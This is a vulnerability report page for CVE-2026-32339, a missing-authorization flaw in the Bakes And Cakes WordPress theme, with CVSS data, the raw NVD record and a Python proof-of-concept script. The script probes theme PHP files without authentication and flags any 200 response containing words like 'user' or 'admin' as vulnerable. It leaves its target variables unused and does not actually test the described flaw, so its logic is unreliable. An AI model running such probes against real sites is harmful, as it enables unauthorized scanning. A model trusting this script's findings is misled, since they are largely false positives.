Security Vulnerability Report
中文
CVE-2026-32339 CVSS 5.3 MEDIUM

CVE-2026-32339

Published: 2026-03-13 19:54:45
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Bakes And Cakes bakes-and-cakes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bakes And Cakes: from n/a through <= 1.2.9.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

raratheme Bakes And Cakes <= 1.2.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32339 PoC - Bakes And Cakes Theme Broken Access Control # This PoC demonstrates the missing authorization vulnerability import requests import sys TARGET_URL = "http://target-site.com/wp-admin/admin-ajax.php" TARGET_PATH = "/wp-content/themes/bakes-and-cakes/" def check_vulnerability(target): """Check if target is vulnerable to CVE-2026-32339""" # Common vulnerable endpoints in Bakes And Cakes theme vulnerable_endpoints = [ "inc/customizer.php", "inc/template-functions.php", "inc/custom-header.php" ] print(f"[*] Testing target: {target}") print(f"[*] CVE-2026-32339: Bakes And Cakes Broken Access Control\n") for endpoint in vulnerable_endpoints: url = target.rstrip('/') + "/" + endpoint print(f"[*] Testing endpoint: {endpoint}") try: # Try to access without authentication response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: # Check for sensitive information exposure if any(keyword in response.text.lower() for keyword in ['admin', 'nonce', 'capability', 'user', 'role']): print(f"[+] VULNERABLE: {endpoint} - May expose sensitive data") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)} bytes\n") else: print(f"[-] Potentially not vulnerable: {endpoint}\n") else: print(f"[-] Status Code: {response.status_code}\n") except requests.exceptions.RequestException as e: print(f"[!] Error testing {endpoint}: {e}\n") print("[*] PoC execution completed") print("[*] Note: Manual verification recommended") if __name__ == "__main__": if len(sys.argv) > 1: check_vulnerability(sys.argv[1]) else: print("Usage: python cve-2026-32339.py <target_url>") print("Example: python cve-2026-32339.py http://example.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32339", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:44.877", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Bakes And Cakes bakes-and-cakes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bakes And Cakes: from n/a through <= 1.2.9."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en raratheme Bakes And Cakes bakes-and-cakes permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Bakes And Cakes: desde n/a hasta &lt;= 1.2.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/bakes-and-cakes/vulnerability/wordpress-bakes-and-cakes-theme-1-2-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}